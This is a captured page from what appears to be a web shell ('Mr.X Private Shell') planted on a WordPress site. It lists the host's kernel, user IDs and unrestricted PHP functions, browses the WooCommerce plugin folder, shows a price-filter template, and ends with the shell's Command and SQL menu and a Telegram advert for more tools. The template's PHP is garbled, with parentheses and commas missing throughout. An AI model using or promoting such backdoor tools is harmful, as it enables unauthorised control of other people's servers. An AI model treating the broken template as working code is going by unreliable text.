Uname: Linux server.digisquadtech.com 4.18.0-553.100.1.el8_10.x86_64 #1 SMP Mon Feb 2 04:13:33 EST 2026 x86_64
User: 1091 (madhavfluid)
Group: 1090 (madhavfluid)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/madhavfluid/public_html/wp-content/plugins///woocommerce/templates      ( Reset | Go to )
File Name: content-widget-price-filter.php
Edit
<?php
/**
 * The template for displaying product price filter widget.
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/content-widget-price-filter.php
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see     https://woocommerce.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 7.0.1
 */

defined'ABSPATH' ) || exit;

?>
<?php do_action
'woocommerce_widget_price_filter_start'$args ); ?>

<form method="get" action="<?php echo esc_url$form_action ); ?>">
    <div class="price_slider_wrapper">
        <div class="price_slider" style="display:none;"></div>
        <div class="price_slider_amount" data-step="<?php echo esc_attr$step ); ?>">
            <label class="screen-reader-text" for="min_price"><?php esc_html_e'Min price''woocommerce' ); ?></label>
            <input type="text" id="min_price" name="min_price" value="<?php echo esc_attr$current_min_price ); ?>" data-min="<?php echo esc_attr$min_price ); ?>" placeholder="<?php echo esc_attr__'Min price''woocommerce' ); ?>" />
            <label class="screen-reader-text" for="max_price"><?php esc_html_e'Max price''woocommerce' ); ?></label>
            <input type="text" id="max_price" name="max_price" value="<?php echo esc_attr$current_max_price ); ?>" data-max="<?php echo esc_attr$max_price ); ?>" placeholder="<?php echo esc_attr__'Max price''woocommerce' ); ?>" />
            <?php /* translators: Filter: verb "to filter" */ ?>
            <button type="submit" class="button<?php echo esc_attrwc_wp_theme_get_element_class_name'button' ) ? ' ' wc_wp_theme_get_element_class_name'button' ) : '' ); ?>"><?php echo esc_html__'Filter''woocommerce' ); ?></button>
            <div class="price_label" style="display:none;">
                <?php echo esc_html__'Price:''woocommerce' ); ?> <span class="from"></span> &mdash; <span class="to"></span>
            </div>
            <?php echo wc_query_string_form_fieldsnull, array( 'min_price''max_price''paged' ), ''true ); ?>
            <div class="clear"></div>
        </div>
    </div>
</form>

<?php do_action'woocommerce_widget_price_filter_end'$args ); ?>

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL